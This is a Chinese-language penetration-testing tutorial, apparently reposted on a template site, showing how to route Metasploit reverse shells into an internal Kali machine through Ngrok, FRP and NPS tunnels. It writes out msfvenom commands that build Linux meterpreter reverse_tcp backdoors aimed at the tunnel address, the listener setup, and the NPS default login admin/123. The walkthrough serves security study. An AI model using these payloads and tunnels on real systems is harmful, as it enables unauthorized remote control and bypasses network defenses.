内网安全-隧道搭建&穿透上线&FRP&NPS&Ngrok

这篇具有很好参考价值的文章主要介绍了内网安全-隧道搭建&穿透上线&FRP&NPS&Ngrok。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

目录

环境介绍

内网穿透-Ngrok-入门-上线--tcp协议

内网穿透-Frp-简易型-上线

内网穿透-Nps-自定义-上线 


环境介绍

实验目的:让msf上线外网,通常情况下,内网可以访问外网,但是外网无法访问到内网,所以外网的木马通常情况下不可能链接到内网。

红色的云作为跳板机,通过隧道进行实现,让内网与跳板机进行通信,外网连接内网,从而实现外网将木马转入内网,实现上线

内网安全-隧道搭建&穿透上线&FRP&NPS&Ngrok

 文章来源地址https://www.toymoban.com/news/detail-403809.html

内网穿透-Ngrok-入门-上线--tcp协议

流程:配置Ngrok——>实现Ngrok与内网通信——>外网执行脚本上线

该实验用的是ngrok工具,访问之后直接注册账号使用即可

本次实验用的tcp隧道,设置远程链接端口为10123,本地端口为kali的地址和端口

工具链接: Ngrok

内网安全-隧道搭建&穿透上线&FRP&NPS&Ngrok 

 

可以看到会生成一个域名,那么可以理解为当外网访问这个域名和端口时,就会将信息转交给内网的kali地址和端口从而实现上线 

内网安全-隧道搭建&穿透上线&FRP&NPS&Ngrok 

 

所以说目前的重点是实现,内网的kali与Ngrok进行通信,这样外网访问Ngrok时才能顺利的将信息传递到内网。

在客户端下载的位置,下载对应的通信脚本,因为kali是linux版本,所以小编下的也是linux版本。

内网安全-隧道搭建&穿透上线&FRP&NPS&Ngrok

内网安全-隧道搭建&穿透上线&FRP&NPS&Ngrok 

将下载的脚本放入kali中,利用命令执行脚本与Ngrok建立通信,查看ngrok页面也发现ip上线

命令:./sunny clientid 隧道id

内网安全-隧道搭建&穿透上线&FRP&NPS&Ngrok

内网安全-隧道搭建&穿透上线&FRP&NPS&Ngrok 

现在kali已经和Ngrok平台建立了通信,接下来只要生成木马,放在外网执行,执行后会通过Ngrok转发到内网的kali中,从而实现上线

注意:

1、生成格式:小编生成的linux后门脚本,所以为elf结尾文件

2、msf56生成linux木马命令不一样

Msf5msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=8888 -f elf > mshell.elf

Msf6:msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=8888 -f elf > mshell.elf

3、地址和端口为隧道的地址和端口,因为当外网无法访问到内网,但是可以访问到隧道,那么后门访问隧道的域名和端口,在通过之前的设置转发给内网地址实现上线

内网安全-隧道搭建&穿透上线&FRP&NPS&Ngrok

 

将生成的木马放到外网服务器中

内网安全-隧道搭建&穿透上线&FRP&NPS&Ngrok 

kali中开启监听,监听本地的3333端口,因为之前隧道设置了访问隧道的数据会转发到本地的3333端口,所以只需要监听3333端口

内网安全-隧道搭建&穿透上线&FRP&NPS&Ngrok

在服务器中为脚本赋予权限,执行即可上线

内网安全-隧道搭建&穿透上线&FRP&NPS&Ngrok

内网安全-隧道搭建&穿透上线&FRP&NPS&Ngrok 

 

内网穿透-Frp-简易型-上线

流程:配置frp客户端与服务端实现通信——>生成后门脚本——>上线

对于Ngrok来说,Frp的有点在于更好的保护隐私,Ngrok毕竟是人家的平台,信息很有可能被窃听。但是Frp可以以自己的外网服务器为平台,可以一定的保证信息的安全性。

注意:Frp文件分为服务端和客户端,外网为服务端,内网为客户端。

在外网开启服务端,利用cat可以查看frps.ini文件(服务端的配置文件),发现监听的是7000端口,开启frps服务(frp文件中frps代表服务端,frpc代表客户端),显示成功监听7000端口 

查看配置文件:cat frps.ini

开启服务:./frps

内网安全-隧道搭建&穿透上线&FRP&NPS&Ngrok

 

在kali的查看frpc.ini文件(客户端配置文件)

[common]

server_addr:服务端IP

server_port:服务端端口

[ssh]

type:连接类型

local_ip:本地地址

local_port:数据转发到本地的端口

remote_port:接受数据的端口

ssh配置6000端口的数据会转发到本地的5555端口,代表访问6000端口的信息都会发送到本地的5555端口,7000端口代表与服务器进行通信的端口。

本地kali为客户端,地址为外网地址和端口,成功建立连接

注意:如何是刚买的外网服务器,记得在控制台开防火墙的7000端口

内网安全-隧道搭建&穿透上线&FRP&NPS&Ngrok

内网安全-隧道搭建&穿透上线&FRP&NPS&Ngrok 

 

生成后门脚本,地址为外网地址,端口为6000,并监听本地5555端口。

后门生成的ip为frp服务端的ip,因为外网可以访问frp服务端,通过服务端转发到客户端。

端口为6000,因为上面设置了6000端口的数据会转发给kali的5555端口,所以后门脚本的数据要从服务端的6000端口发送

监听本地5555端口,因为上面设置了会将6000端口的数据全部转发到5555端口,所以监听端口为5555

内网安全-隧道搭建&穿透上线&FRP&NPS&Ngrok

内网安全-隧道搭建&穿透上线&FRP&NPS&Ngrok 

用另外一台外网服务器执行后门脚本,成功上线kali

内网安全-隧道搭建&穿透上线&FRP&NPS&Ngrok

内网安全-隧道搭建&穿透上线&FRP&NPS&Ngrok 

 

内网穿透-Nps-自定义-上线 

小编感觉Nps还是非常好用的,不仅弥补了Ngrok容易信息泄露的缺点,而且还是个图形化界面,功能也多,yyds。

Nps依旧是分为客户端和服务端,依旧是外网为服务端,内网kali为客户端

将服务端文件放入外网服务器中,用命令安装nps

安装:./nps install

内网安全-隧道搭建&穿透上线&FRP&NPS&Ngrok

 

开启nps服务,如果端口被占用记得关闭啊。

访问服务端的8080端口可以发现存在登录页面,初始账号密码为admin/123

内网安全-隧道搭建&穿透上线&FRP&NPS&Ngrok 

内网安全-隧道搭建&穿透上线&FRP&NPS&Ngrok 

 

 

登录进去之后,在客户端中新增一条规则,并新增一条隧道,tcp协议,服务端口为访问的端口,目标为服务端口的映射,不写ip默认为本地(端口一定要写)

所以可以理解为是将6000端口的数据都会同意转发到kali IP的5555端口,那么在生成后门时自然端口就要是6000端口。

秘钥:一会客户端用

内网安全-隧道搭建&穿透上线&FRP&NPS&Ngrok 

内网安全-隧道搭建&穿透上线&FRP&NPS&Ngrok 

 

 

让本地的kali作为客户端,下载客户端的文件,利用npc文件去链接服务端(注意:此处链接端口为8024),在输入秘钥即可

内网安全-隧道搭建&穿透上线&FRP&NPS&Ngrok 

 

 生成后门,端口和ip都为服务端

内网安全-隧道搭建&穿透上线&FRP&NPS&Ngrok 

 

将脚本放入另外一个外网中,执行即可上线

内网安全-隧道搭建&穿透上线&FRP&NPS&Ngrok 

内网安全-隧道搭建&穿透上线&FRP&NPS&Ngrok 

 

到了这里,关于内网安全-隧道搭建&穿透上线&FRP&NPS&Ngrok的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 常见的内网穿透工具有 ngrok/ localtunnel/ frp

    内网穿透工具的工作原理是通过在本地网络和公共网络之间建立一个通道,将公网流量转发到本地网络中的服务。这样, 在没有公网 IP 或无法直接访问的情况下,用户可以通过公网访问本地网络中的服务。 介绍:ngrok 是一个强大且易于使用的内网穿透工具,支持多种协议和

    2024年02月07日
    浏览(37)
  • 内网穿透NPS搭建以及使用

    今天说一下 内网穿透代理(NPS)搭建以及使用,内网穿透必然有一个外网服务器做代理转发,市面上的NATAPP、花生壳等也都是一个原理。 需求: window 本地开发,外网访问本地服务联合调试 环境: 公网:linux服务器 内网:window 11 新建一个NPS文件夹 进入NPS文件夹 下载 服务端

    2024年01月23日
    浏览(41)
  • 使用NPS搭建内网(穿透[保姆级教程])

    服务端的配置 下载的zip文件先解压(太慢了我是在外面下载的 拖进去的) 成功开启后在web端访问vpsip:8080,进入npsweb控制端。 然后点击客户端,新建一个客户端的链接方式。 点击隧道,添加各种自己想设置的代理。 Sockets代理 Sockets代理设为1998端口。 端口转发 把内网靶机的

    2024年02月11日
    浏览(39)
  • 【ngrok】自己服务器简单搭建钉钉ngrok和一些免费内网穿透

    如没有自己的服务器,可以购买阿里云的这个,99一年3M带宽不限流量,不限流量这点我真的是大爱啊! 我看好多ngrok都是10元一个月,而且就给一个端口,自己搭建可以用无数端口关键还可以自己玩个服务器!美滋滋! https://github.com/fatedier/frp/releases 执行以下命令,下载frp工

    2024年01月17日
    浏览(44)
  • 使用nps搭建内网穿透并配置泛域名解析

    nps是什么? nps是一款轻量级、高性能、功能强大的内网穿透代理服务器。目前支持tcp、udp流量转发,可支持任何tcp、udp上层协议,此外还支持内网http代理、内网socks5代理、p2p等,并带有功能强大的web管理端。 一台拥有公网IP的云服务器,我这里使用的是腾讯云轻量应用服务

    2024年02月05日
    浏览(80)
  • frp内网穿透搭建

    为什么需要内网穿透功能? 从公网中访问自己的私有设备向来都是一件难事。自己的台式机、NAS等等设备,它们可能处于路由器后,或者运营商因为IP地址短缺不给你分配公网IP地址。果我们想直接访问这些设备(远程桌面、远程文件、SSH等等),一般来说要通过一些转发或

    2024年02月03日
    浏览(45)
  • 如何搭建frp实现内网穿透?

    所谓内网穿透,也就是局域网能够直接通过公网的ip去访问,极大的方便用户的日常远程的一些操作的使用。比如nas的远程访问,个人博客的搭建等等。 然而,从公网中访问自己的私有设备向来是一件难事儿。 比如自己的主力台式机、NAS等等设备,它们可能处于路由器后,或

    2024年02月10日
    浏览(44)
  • 虚拟机服务器搭建+FRP内网穿透

    一、虚拟机安装         这里安装的是vmware workstation 17 pro和CentOS-7-x86_64-DVD-2009镜像文件  centos虚拟机服务器手把手搭建_虚拟机搭建服务器_无名之辈之码谷娃的博客-CSDN博客  这篇文章对虚拟机搭建讲的还是比较详细。 完成后,需要为用户添加sudo权限,不然你创建的用户是

    2024年01月20日
    浏览(49)
  • 阿里云搭建frp服务实现本地内网穿透

    如果使用我的链接购买阿里云服务器,我将免费提供帮忙搭建阿里云的frp服务。 背景 利用阿里云搭建frp服务,本地frp客户端来实现内网穿透,来达到访问没有公网ip的远程机器 frp服务端搭建 首先我们先安装一键部署frp的脚本,如果是阿里云的服务器直接用以下源: Aliyun 首先选

    2024年01月19日
    浏览(40)
  • 内网安全:隧道技术详解_第125天:内网安全-隧道技术&smb&icmp&正反向连接&防火墙出入规则上线

    目录 隧道技术 反向连接技术 反向连接实验所用网络拓扑图及说明 网络说明 防火墙限制说明 实验前提说明 实战一:CS反向连接上线 - 拿下Win2008 一. 使用转发代理上线创建监听器 二. 上传后门执行上线 隧道技术 - SMB协议 SMB协议介绍 实战二:SMB协议搭建隧道 正向连接 - 拿下

    2024年02月22日
    浏览(46)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包